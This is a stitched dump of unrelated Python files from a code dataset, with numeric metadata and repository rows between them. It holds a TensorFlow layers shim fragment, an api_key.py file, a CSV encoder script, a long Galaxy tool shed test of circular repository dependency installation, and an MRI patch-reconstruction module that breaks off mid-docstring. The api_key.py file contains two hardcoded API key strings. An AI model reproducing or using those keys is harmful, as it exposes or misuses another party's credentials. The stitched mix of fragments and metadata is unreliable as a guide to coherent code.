from tensorflow.python.layers.layers import average_pooling1d
from tensorflow.python.layers.layers import average_pooling2d
from tensorflow.python.layers.layers import average_pooling3d
from tensorflow.python.layers.layers import batch_normalization
from tensorflow.python.layers.layers import max_pooling1d
from tensorflow.python.layers.layers import max_pooling2d
from tensorflow.python.layers.layers import max_pooling3d
# Remove the compatibility helper from the module namespace so it is not
# re-exported as part of this module's public API (this file appears to be an
# auto-generated TF API shim — NOTE(review): confirm against the generator).
del _print_function
| 51.914894
| 82
| 0.872131
| 309
| 2,440
| 6.812298
| 0.210356
| 0.281235
| 0.342043
| 0.432304
| 0.749644
| 0.746793
| 0.571972
| 0.363895
| 0.363895
| 0.363895
| 0
| 0.012384
| 0.073361
| 2,440
| 46
| 83
| 53.043478
| 0.91862
| 0.066393
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.974359
| 0
| 0.974359
| 0.051282
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8ab875a2832201c1e15c76ec4a0d649fdc25f125
| 99
|
py
|
Python
|
api_key.py
|
nBuze/CanaBot
|
fe27136d5d39b99829db380f97a89b3a15a7694c
|
[
"MIT"
] | 1
|
2018-02-24T03:05:26.000Z
|
2018-02-24T03:05:26.000Z
|
api_key.py
|
nBuze/CanaBot
|
fe27136d5d39b99829db380f97a89b3a15a7694c
|
[
"MIT"
] | null | null | null |
api_key.py
|
nBuze/CanaBot
|
fe27136d5d39b99829db380f97a89b3a15a7694c
|
[
"MIT"
] | 1
|
2018-08-11T16:33:59.000Z
|
2018-08-11T16:33:59.000Z
|
# NOTE(review): these look like hardcoded third-party service API keys
# (presumably for linguistic / text-analysis endpoints — confirm against the
# callers). Secrets should not be committed to source control: load them from
# environment variables or a config file instead, and rotate these keys if
# they are live.
LINGUISTIC = '297a35355ae64859b04b10d90cf43813'
TEXT_ANALYSIS = '02a6411250204d66b5fcb32dad085732'
| 33
| 50
| 0.878788
| 5
| 99
| 17.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.505376
| 0.060606
| 99
| 2
| 51
| 49.5
| 0.419355
| 0
| 0
| 0
| 0
| 0
| 0.646465
| 0.646465
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76d4bac6fbe6eab932f4991e6555ed8cabc605f8
| 126
|
py
|
Python
|
libs/supercell_resource_decoder/encoder_csv.py
|
fourjr/rw-data
|
8a767f60ffc169311939f701e6d266ed1d81cc9b
|
[
"MIT"
] | null | null | null |
libs/supercell_resource_decoder/encoder_csv.py
|
fourjr/rw-data
|
8a767f60ffc169311939f701e6d266ed1d81cc9b
|
[
"MIT"
] | null | null | null |
libs/supercell_resource_decoder/encoder_csv.py
|
fourjr/rw-data
|
8a767f60ffc169311939f701e6d266ed1d81cc9b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Encode the CSV resource file named on the command line via lib_csv."""
import sys
from lib_csv import encode_file
from lib_csv import restore_file
# Guard against a missing argument: previously sys.argv[1] raised a bare
# IndexError; exit with a usage message instead.
if len(sys.argv) < 2:
    sys.exit('usage: %s <file>' % sys.argv[0])
encode_file(sys.argv[1])
| 15.75
| 32
| 0.801587
| 23
| 126
| 4.173913
| 0.608696
| 0.145833
| 0.208333
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018018
| 0.119048
| 126
| 7
| 33
| 18
| 0.846847
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76ee80fd9a7016a9ca3e312f6e6da9a429ccae80
| 30,760
|
py
|
Python
|
test/tool_shed/functional/test_1080_advanced_circular_dependency_installation.py
|
thata/galaxy-dist
|
6c3ffa064faf0c500f5594ed7b58ed839b00f337
|
[
"CC-BY-3.0"
] | 2
|
2016-02-23T00:09:14.000Z
|
2019-02-11T07:48:44.000Z
|
test/tool_shed/functional/test_1080_advanced_circular_dependency_installation.py
|
thata/galaxy-dist
|
6c3ffa064faf0c500f5594ed7b58ed839b00f337
|
[
"CC-BY-3.0"
] | null | null | null |
test/tool_shed/functional/test_1080_advanced_circular_dependency_installation.py
|
thata/galaxy-dist
|
6c3ffa064faf0c500f5594ed7b58ed839b00f337
|
[
"CC-BY-3.0"
] | 6
|
2015-05-27T13:09:50.000Z
|
2019-02-11T07:48:46.000Z
|
from tool_shed.base.twilltestcase import ShedTwillTestCase, common, os, logging
import tool_shed.base.test_db_util as test_db_util
# Repository fixtures for this test case: column_maker and convert_chars are
# later configured to depend on each other (a circular repository dependency).
column_repository_name = 'column_maker_0080'
column_repository_description = "Add column"
column_repository_long_description = "Compute an expression on every row"
convert_repository_name = 'convert_chars_0080'
convert_repository_description = "Convert delimiters"
convert_repository_long_description = "Convert delimiters to tab"
# Tool shed category under which both repositories are created.
category_name = 'Test 0080 Advanced Circular Dependencies'
category_description = 'Test circular dependency features'
log = logging.getLogger( __name__ )
# Flipped to True when this run creates the repositories itself (standalone
# execution); test_0015 then uploads the dependency definition files.
running_standalone = False
class TestRepositoryDependencies( ShedTwillTestCase ):
    '''Testing uninstalling and reinstalling repository dependencies, and setting tool panel sections.'''
    def test_0000_create_or_login_admin_user( self ):
        """Create necessary user accounts and login as an admin user."""
        self.galaxy_logout()
        self.galaxy_login( email=common.admin_email, username=common.admin_username )
        galaxy_admin_user = test_db_util.get_galaxy_user( common.admin_email )
        assert galaxy_admin_user is not None, 'Problem retrieving user with email %s from the database' % common.admin_email
        galaxy_admin_user_private_role = test_db_util.get_galaxy_private_role( galaxy_admin_user )
        self.logout()
        self.login( email=common.test_user_1_email, username=common.test_user_1_name )
        test_user_1 = test_db_util.get_user( common.test_user_1_email )
        # Fixed: the failure message referenced the bare name test_user_1_email,
        # which is undefined in this scope — a failing lookup would have raised
        # NameError instead of the intended AssertionError.
        assert test_user_1 is not None, 'Problem retrieving user with email %s from the database' % common.test_user_1_email
        test_user_1_private_role = test_db_util.get_private_role( test_user_1 )
        self.logout()
        self.login( email=common.admin_email, username=common.admin_username )
        admin_user = test_db_util.get_user( common.admin_email )
        # Fixed: same NameError hazard with the bare name admin_email.
        assert admin_user is not None, 'Problem retrieving user with email %s from the database' % common.admin_email
        admin_user_private_role = test_db_util.get_private_role( admin_user )
    def test_0005_create_and_populate_column_repository( self ):
        """Create the category for this test suite, then create and populate column_maker."""
        category = self.create_category( name=category_name, description=category_description )
        global running_standalone
        self.logout()
        self.login( email=common.test_user_1_email, username=common.test_user_1_name )
        repository = self.get_or_create_repository( name=column_repository_name,
                                                    description=column_repository_description,
                                                    long_description=column_repository_long_description,
                                                    owner=common.test_user_1_name,
                                                    category_id=self.security.encode_id( category.id ),
                                                    strings_displayed=[] )
        if self.repository_is_new( repository ):
            self.upload_file( repository,
                              'column_maker/column_maker.tar',
                              strings_displayed=[],
                              commit_message='Uploaded column_maker.tar.' )
            running_standalone = True
    def test_0010_create_and_populate_convert_repository( self ):
        '''Create and populate the convert_chars repository.'''
        global running_standalone
        self.logout()
        self.login( email=common.admin_email, username=common.admin_username )
        category = self.create_category( name=category_name, description=category_description )
        self.logout()
        self.login( email=common.test_user_1_email, username=common.test_user_1_name )
        repository = self.get_or_create_repository( name=convert_repository_name,
                                                    description=convert_repository_description,
                                                    long_description=convert_repository_long_description,
                                                    owner=common.test_user_1_name,
                                                    category_id=self.security.encode_id( category.id ),
                                                    strings_displayed=[] )
        if self.repository_is_new( repository ):
            self.upload_file( repository,
                              'convert_chars/convert_chars.tar',
                              strings_displayed=[],
                              commit_message='Uploaded convert_chars.tar.' )
            running_standalone = True
    def test_0015_upload_dependency_xml_if_needed( self ):
        '''If this test is being run by itself, it will not have repository dependencies configured yet.'''
        global running_standalone
        if running_standalone:
            # Make column_maker depend on convert_chars...
            convert_repository = test_db_util.get_repository_by_name_and_owner( convert_repository_name, common.test_user_1_name )
            column_repository = test_db_util.get_repository_by_name_and_owner( column_repository_name, common.test_user_1_name )
            repository_dependencies_path = self.generate_temp_path( 'test_1080', additional_paths=[ 'convert' ] )
            self.generate_repository_dependency_xml( [ convert_repository ],
                                                     self.get_filename( 'repository_dependencies.xml', filepath=repository_dependencies_path ),
                                                     dependency_description='Column maker depends on the convert repository.' )
            self.upload_file( column_repository,
                              'repository_dependencies.xml',
                              filepath=repository_dependencies_path,
                              commit_message='Uploaded dependency on convert' )
            # ...and convert_chars depend on column_maker, closing the circle.
            convert_repository = test_db_util.get_repository_by_name_and_owner( convert_repository_name, common.test_user_1_name )
            column_repository = test_db_util.get_repository_by_name_and_owner( column_repository_name, common.test_user_1_name )
            repository_dependencies_path = self.generate_temp_path( 'test_1080', additional_paths=[ 'convert' ] )
            self.generate_repository_dependency_xml( [ column_repository ],
                                                     self.get_filename( 'repository_dependencies.xml', filepath=repository_dependencies_path ),
                                                     dependency_description='Convert chars depends on the column_maker repository.' )
            self.upload_file( convert_repository,
                              'repository_dependencies.xml',
                              filepath=repository_dependencies_path,
                              commit_message='Uploaded dependency on column' )
    def test_0020_install_convert_repository( self ):
        '''Install convert_chars without repository dependencies into convert_chars tool panel section.'''
        self.galaxy_logout()
        self.galaxy_login( email=common.admin_email, username=common.admin_username )
        self.install_repository( convert_repository_name,
                                 common.test_user_1_name,
                                 category_name,
                                 install_tool_dependencies=False,
                                 install_repository_dependencies=False,
                                 new_tool_panel_section='convert_chars' )
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        browse_strings_displayed = [ installed_convert_repository.name,
                                     installed_convert_repository.description,
                                     installed_convert_repository.tool_shed,
                                     installed_convert_repository.installed_changeset_revision ]
        strings_displayed = [ installed_convert_repository.name,
                              installed_convert_repository.description,
                              installed_convert_repository.tool_shed,
                              installed_convert_repository.installed_changeset_revision,
                              installed_column_repository.name,
                              installed_column_repository.installed_changeset_revision,
                              'Missing repository dependencies' ]
        self.display_galaxy_browse_repositories_page( strings_displayed=browse_strings_displayed )
        self.display_installed_repository_manage_page( installed_convert_repository,
                                                       strings_displayed=strings_displayed )
    def test_0025_install_column_repository( self ):
        '''Install column maker with repository dependencies into column_maker tool panel section.'''
        self.install_repository( column_repository_name,
                                 common.test_user_1_name,
                                 category_name,
                                 install_repository_dependencies=True,
                                 new_tool_panel_section='column_maker',
                                 strings_displayed=[ 'install_repository_dependencies' ] )
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        browse_strings_displayed = [ installed_convert_repository.name,
                                     installed_convert_repository.description,
                                     installed_convert_repository.tool_shed,
                                     installed_convert_repository.installed_changeset_revision,
                                     installed_column_repository.name,
                                     installed_column_repository.description,
                                     installed_column_repository.installed_changeset_revision ]
        strings_displayed = [ installed_column_repository.name,
                              installed_column_repository.description,
                              installed_column_repository.tool_shed,
                              installed_column_repository.installed_changeset_revision,
                              installed_convert_repository.name,
                              installed_convert_repository.installed_changeset_revision,
                              'Installed repository dependencies' ]
        self.display_galaxy_browse_repositories_page( strings_displayed=browse_strings_displayed )
        self.display_installed_repository_manage_page( installed_column_repository,
                                                       strings_displayed=strings_displayed )
    def test_0030_deactivate_convert_repository( self ):
        '''Deactivate convert_chars, verify that column_maker is installed and missing repository dependencies.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        # remove_from_disk=False deactivates rather than uninstalls.
        self.uninstall_repository( installed_convert_repository, remove_from_disk=False )
        strings_displayed = [ installed_column_repository.name,
                              installed_column_repository.description,
                              installed_column_repository.tool_shed,
                              installed_column_repository.installed_changeset_revision,
                              installed_convert_repository.name,
                              installed_convert_repository.installed_changeset_revision,
                              'Missing repository dependencies',
                              'Deactivated' ]
        self.display_installed_repository_manage_page( installed_column_repository,
                                                       strings_displayed=strings_displayed )
    def test_0035_reactivate_convert_repository( self ):
        '''Reactivate convert_chars, both convert_chars and column_maker should now show as installed.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.reactivate_repository( installed_convert_repository )
        strings_displayed = [ installed_convert_repository.name,
                              installed_convert_repository.description,
                              installed_convert_repository.tool_shed,
                              installed_convert_repository.installed_changeset_revision,
                              installed_column_repository.name,
                              installed_column_repository.installed_changeset_revision,
                              'Installed repository dependencies' ]
        # Fixed: strings_displayed was built but never checked, so this test
        # verified nothing; check the manage page as every sibling test does.
        self.display_installed_repository_manage_page( installed_convert_repository,
                                                       strings_displayed=strings_displayed )
    def test_0040_deactivate_column_repository( self ):
        '''Deactivate column_maker, verify that convert_chars is installed and missing repository dependencies.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.uninstall_repository( installed_column_repository, remove_from_disk=False )
        strings_displayed = [ installed_convert_repository.name,
                              installed_convert_repository.description,
                              installed_convert_repository.tool_shed,
                              installed_convert_repository.installed_changeset_revision,
                              installed_column_repository.name,
                              installed_column_repository.installed_changeset_revision,
                              'Missing repository dependencies',
                              'Deactivated' ]
        self.display_installed_repository_manage_page( installed_convert_repository,
                                                       strings_displayed=strings_displayed )
    def test_0045_deactivate_convert_repository( self ):
        '''Deactivate convert_chars, verify that both convert_chars and column_maker are deactivated.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.uninstall_repository( installed_convert_repository, remove_from_disk=False )
        strings_not_displayed = [ installed_column_repository.name,
                                  installed_column_repository.installed_changeset_revision,
                                  installed_convert_repository.name,
                                  installed_convert_repository.installed_changeset_revision ]
        self.display_galaxy_browse_repositories_page( strings_not_displayed=strings_not_displayed )
    def test_0050_reactivate_column_repository( self ):
        '''Reactivate column_maker. This should not automatically reactivate convert_chars, so column_maker should be displayed as installed but missing repository dependencies.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.reactivate_repository( installed_column_repository )
        strings_displayed = [ installed_column_repository.name,
                              installed_column_repository.description,
                              installed_column_repository.tool_shed,
                              installed_column_repository.installed_changeset_revision,
                              installed_convert_repository.name,
                              installed_convert_repository.installed_changeset_revision,
                              'Missing repository dependencies',
                              'Deactivated' ]
        self.display_installed_repository_manage_page( installed_column_repository,
                                                       strings_displayed=strings_displayed )
    def test_0055_reactivate_convert_repository( self ):
        '''Activate convert_chars. Both convert_chars and column_maker should now show as installed.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.reactivate_repository( installed_convert_repository )
        strings_displayed = [ installed_column_repository.name,
                              installed_column_repository.description,
                              installed_column_repository.tool_shed,
                              installed_column_repository.installed_changeset_revision,
                              installed_convert_repository.name,
                              installed_convert_repository.installed_changeset_revision,
                              'Installed repository dependencies' ]
        self.display_installed_repository_manage_page( installed_column_repository,
                                                       strings_displayed=strings_displayed )
        strings_displayed = [ installed_convert_repository.name,
                              installed_convert_repository.description,
                              installed_convert_repository.tool_shed,
                              installed_convert_repository.installed_changeset_revision,
                              installed_column_repository.name,
                              installed_column_repository.installed_changeset_revision,
                              'Installed repository dependencies' ]
        self.display_installed_repository_manage_page( installed_convert_repository,
                                                       strings_displayed=strings_displayed )
    def test_0060_uninstall_column_repository( self ):
        '''Uninstall column_maker. Verify that convert_chars is installed and missing repository dependencies, and column_maker was in the right tool panel section.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.uninstall_repository( installed_column_repository, remove_from_disk=True )
        strings_displayed = [ installed_convert_repository.name,
                              installed_convert_repository.description,
                              installed_convert_repository.tool_shed,
                              installed_convert_repository.installed_changeset_revision,
                              installed_column_repository.name,
                              installed_column_repository.installed_changeset_revision,
                              'Missing repository dependencies',
                              'Uninstalled' ]
        self.display_installed_repository_manage_page( installed_convert_repository,
                                                       strings_displayed=strings_displayed )
        self.check_galaxy_repository_tool_panel_section( installed_column_repository, 'column_maker' )
    def test_0065_reinstall_column_repository( self ):
        '''Reinstall column_maker without repository dependencies, verify both convert_chars and column_maker are installed.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.reinstall_repository( installed_column_repository, install_repository_dependencies=False )
        strings_displayed = [ installed_column_repository.name,
                              installed_column_repository.description,
                              installed_column_repository.tool_shed,
                              installed_column_repository.installed_changeset_revision,
                              installed_convert_repository.name,
                              installed_convert_repository.installed_changeset_revision,
                              'Installed repository dependencies' ]
        self.display_installed_repository_manage_page( installed_column_repository,
                                                       strings_displayed=strings_displayed )
        strings_displayed = [ installed_convert_repository.name,
                              installed_convert_repository.description,
                              installed_convert_repository.tool_shed,
                              installed_convert_repository.installed_changeset_revision,
                              installed_column_repository.name,
                              installed_column_repository.installed_changeset_revision,
                              'Installed repository dependencies' ]
        self.display_installed_repository_manage_page( installed_convert_repository,
                                                       strings_displayed=strings_displayed )
    def test_0070_uninstall_convert_repository( self ):
        '''Uninstall convert_chars, verify column_maker installed but missing repository dependencies.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.uninstall_repository( installed_convert_repository, remove_from_disk=True )
        strings_displayed = [ installed_column_repository.name,
                              installed_column_repository.description,
                              installed_column_repository.tool_shed,
                              installed_column_repository.installed_changeset_revision,
                              installed_convert_repository.name,
                              installed_convert_repository.installed_changeset_revision,
                              'Missing repository dependencies',
                              'Uninstalled' ]
        self.display_installed_repository_manage_page( installed_column_repository,
                                                       strings_displayed=strings_displayed )
        self.check_galaxy_repository_tool_panel_section( installed_convert_repository, 'convert_chars' )
    def test_0075_uninstall_column_repository( self ):
        '''Uninstall column_maker, verify that both convert_chars and column_maker are uninstalled.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.uninstall_repository( installed_column_repository, remove_from_disk=True )
        strings_displayed = [ installed_convert_repository.name,
                              installed_convert_repository.description,
                              installed_convert_repository.tool_shed,
                              installed_convert_repository.installed_changeset_revision,
                              installed_column_repository.name,
                              installed_column_repository.installed_changeset_revision,
                              'Missing repository dependencies',
                              'Activate or reinstall repository',
                              'Uninstalled' ]
        self.display_installed_repository_manage_page( installed_convert_repository,
                                                       strings_displayed=strings_displayed )
    def test_0080_reinstall_convert_repository( self ):
        '''Reinstall convert_chars with repository dependencies, verify that this installs both convert_chars and column_maker.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.reinstall_repository( installed_convert_repository,
                                   install_repository_dependencies=True,
                                   no_changes=False,
                                   new_tool_panel_section='convert_maker' )
        strings_displayed = [ installed_column_repository.name,
                              installed_column_repository.description,
                              installed_column_repository.tool_shed,
                              installed_column_repository.installed_changeset_revision,
                              installed_convert_repository.name,
                              installed_convert_repository.installed_changeset_revision,
                              'Installed repository dependencies' ]
        self.display_installed_repository_manage_page( installed_column_repository,
                                                       strings_displayed=strings_displayed )
        strings_displayed = [ installed_convert_repository.name,
                              installed_convert_repository.description,
                              installed_convert_repository.tool_shed,
                              installed_convert_repository.installed_changeset_revision,
                              installed_column_repository.name,
                              installed_column_repository.installed_changeset_revision,
                              'Installed repository dependencies' ]
        self.display_installed_repository_manage_page( installed_convert_repository,
                                                       strings_displayed=strings_displayed )
    def test_0085_uninstall_all_repositories( self ):
        '''Uninstall convert_chars and column_maker to verify that they are in the right tool panel sections.'''
        installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
                                                                                            common.test_user_1_name )
        installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
                                                                                           common.test_user_1_name )
        self.uninstall_repository( installed_column_repository, remove_from_disk=True )
        self.uninstall_repository( installed_convert_repository, remove_from_disk=True )
        test_db_util.ga_refresh( installed_column_repository )
        test_db_util.ga_refresh( installed_convert_repository )
        self.check_galaxy_repository_tool_panel_section( installed_column_repository, 'convert_maker' )
        self.check_galaxy_repository_tool_panel_section( installed_convert_repository, 'convert_maker' )
| 81.16095
| 180
| 0.606404
| 2,683
| 30,760
| 6.439806
| 0.067835
| 0.121021
| 0.130918
| 0.037331
| 0.831346
| 0.82388
| 0.800787
| 0.79471
| 0.786665
| 0.767276
| 0
| 0.007027
| 0.352308
| 30,760
| 378
| 181
| 81.375661
| 0.860212
| 0.060663
| 0
| 0.764205
| 0
| 0
| 0.05108
| 0.00691
| 0
| 0
| 0
| 0
| 0.008523
| 1
| 0.051136
| false
| 0
| 0.005682
| 0
| 0.059659
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76f6986d3995a5e29eb7e93fe514c9235c05ad72
| 14,933
|
py
|
Python
|
GUI/PyQt/utils/Unpatching.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 22
|
2018-04-27T21:28:46.000Z
|
2021-12-24T06:44:55.000Z
|
GUI/PyQt/utils/Unpatching.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 81
|
2017-11-09T17:23:15.000Z
|
2020-01-28T22:54:13.000Z
|
GUI/PyQt/utils/Unpatching.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 18
|
2017-11-13T16:12:17.000Z
|
2020-08-27T10:17:34.000Z
|
import numpy as np
import math
#########################################################################################################################################
#Module: Unpatching #
#The module Unpatching is responsible for reconstructing the probability-images. To reconstruct the images the means of all #
#probabilities from overlapping patches are calculated and are assigned to every pixel-image. It's important to consider the order of #
#dimensions within the algorithm of the module RigidPatching. In this case the order is: weight(x), height(y), depth(z) #
#The Unpatching-module contains two functions:                                                                                         #
#fUnpatch2D: For 2D Patch-Splitting #
#fUnpatch3D: For 3D Patch-Splitting #
#########################################################################################################################################
#########################################################################################################################################
#Function: fUnpatch2D #
#The function fUnpatch2D has the task to reconstruct the probability-images. Every patch contains the probability of every class. #
#To visualize the probabilities it is important to reconstruct the probability-images. This function is used for 2D patching. # #
#Input: prob_list ---> list of probabilities of every Patch. The column describes the classes, the row describes the probability of #
# every class #
# patchSize ---> size of patches, example: [40, 40, 10], patchSize[0] = height, patchSize[1] = weight, patchSize[2] = depth #
# patchOverlap ---> the ratio for overlapping, example: 0.25 # #
# actualSize ---> the actual size of the chosen mrt-layer: example: ab, t1_tse_tra_Kopf_0002; actual size = [256, 196, 40] #
# iClass ---> the number of the class, example: ref = 0, artefact = 1 #
#Output: unpatchImg ---> 3D-Numpy-Array, which contains the probability of every image pixel. #
#########################################################################################################################################
def fUnpatch2D(prob_list, patchSize, patchOverlap, actualSize, iClass):
    """Reconstruct a 3D probability image from overlapping 2D patches.

    Each patch's class probability is accumulated over the pixels it covers;
    the per-pixel mean is taken over all overlapping patches, and the padding
    introduced by the patching step is cropped away at the end. Patch corners
    advance column-first, then row, then slice — this must match the order
    used by the patching module (RigidPatching).

    :param prob_list: 2D array, one row per patch; column ``iClass`` holds the
        probability of the class of interest for that patch.
    :param patchSize: [height, width] of the 2D patches, e.g. [40, 40].
    :param patchOverlap: overlap ratio used during patching, e.g. 0.25.
    :param actualSize: [height, width, depth] of the original volume.
    :param iClass: column index of the class to unpatch (e.g. ref=0, artefact=1).
    :return: 3D numpy array of per-pixel mean probabilities, cropped to actualSize.
    """
    iCorner = [0, 0, 0]  # current patch corner (y, x, z)
    dOverlap = np.round(np.multiply(patchSize, patchOverlap))
    dNotOverlap = [patchSize[0] - dOverlap[0], patchSize[1] - dOverlap[1]]
    # Size the patching step padded the volume to. Cast each entry to int:
    # np.round yields floats, and float dimensions make np.zeros raise a
    # TypeError on modern NumPy (the products are exact whole numbers).
    paddedSize = [int(math.ceil((actualSize[0] - dOverlap[0]) / (dNotOverlap[0])) * dNotOverlap[0] + dOverlap[0]),
                  int(math.ceil((actualSize[1] - dOverlap[1]) / (dNotOverlap[1])) * dNotOverlap[1] + dOverlap[1]),
                  int(actualSize[2])]
    unpatchImg = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))  # probability sums
    numVal = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))      # overlap counts
    for iIndex in range(0, prob_list.shape[0], 1):
        lMask = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
        lMask[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), iCorner[2]] = 1
        unpatchImg[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), iCorner[2]] \
            = np.add(unpatchImg[iCorner[0]:iCorner[0] + int(patchSize[0]),
                                iCorner[1]:iCorner[1] + int(patchSize[1]),
                                iCorner[2]],
                     prob_list[iIndex, iClass])
        lMask = lMask == 1
        numVal[lMask] = numVal[lMask] + 1
        # Advance the corner: x first, then y, then the slice index z.
        iCorner[1] = int(iCorner[1] + dNotOverlap[1])
        if iCorner[1] + patchSize[1] - 1 > paddedSize[1]:
            iCorner[1] = 0
            iCorner[0] = int(iCorner[0] + dNotOverlap[0])
        if iCorner[0] + patchSize[0] - 1 > paddedSize[0]:
            iCorner[0] = 0
            iCorner[1] = 0
            iCorner[2] = int(iCorner[2] + 1)
            print(str(iCorner[2] / actualSize[2] * 100) + "%")
    unpatchImg = np.divide(unpatchImg, numVal)  # mean over overlapping patches
    if paddedSize == actualSize:
        pass
    else:
        # Crop the (symmetric) padding back to the original in-plane size.
        pad_y = int((paddedSize[0] - actualSize[0]) / 2)
        pad_x = int((paddedSize[1] - actualSize[1]) / 2)
        pad_y_max = int(paddedSize[0] - (paddedSize[0] - actualSize[0] - pad_y))
        pad_x_max = int(paddedSize[1] - (paddedSize[1] - actualSize[1] - pad_x))
        unpatchImg = unpatchImg[pad_y:pad_y_max, pad_x:pad_x_max, :]
    return unpatchImg
#########################################################################################################################################
#Function: fUnpatch3D #
#The function fUnpatch3D has the task to reconstruct the probability-images. Every patch contains the probability of every class. #
#To visualize the probabilities it is important to reconstruct the probability-images. This function is used for 3D patching.          # #
#Input: prob_list ---> list of probabilities of every Patch. The column describes the classes, the row describes the probability of #
# every class #
# patchSize ---> size of patches, example: [40, 40, 10], patchSize[0] = height, patchSize[1] = weight, patchSize[2] = depth #
# patchOverlap ---> the ratio for overlapping, example: 0.25 # #
# actualSize ---> the actual size of the chosen mrt-layer: example: ab, t1_tse_tra_Kopf_0002; actual size = [256, 196, 40] #
# iClass ---> the number of the class, example: ref = 0, artefact = 1 #
#Output: unpatchImg ---> 3D-Numpy-Array, which contains the probability of every image pixel. #
#########################################################################################################################################
def fUnpatch3D(prob_list, patchSize, patchOverlap, actualSize, iClass=1):
    """Reconstruct a 3D probability image from overlapping 3D patches.

